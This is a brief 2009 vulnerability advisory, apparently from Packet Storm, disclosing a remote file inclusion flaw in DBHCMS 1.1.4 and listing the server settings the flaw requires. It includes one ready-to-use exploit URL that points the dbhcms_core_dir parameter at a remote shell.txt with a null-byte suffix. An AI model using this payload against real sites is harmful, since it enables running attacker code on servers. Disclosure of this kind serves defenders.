DBHCMS 1.1.4 Remote File Inclusion

2009-12-30T00:00:00
ID PACKETSTORM:84422
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-12-30T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: DBHCMS Web Content Management System   
# Version: 1.1.4  
# Download: :(  
#################################################################  
# Discoverd By: Securitylab.ir   
# Website: http://Securitylab.ir  
# Contacts: admin[at]securitylab.ir & k4mr4n_st@yahoo.com  
#################################################################  
# Vulnerability Info:  
# Type: RFI (Remote File Inclusion)  
# Risk: High  
#===========================================================  
# http://site.com/index.php?dbhcms_core_dir=http://site.com/shell.txt%00  
# Need: register_globals = ON and allow_url_include = ON   
#===========================================================  
# Securitylab Security Research Team  
###################################################################  
`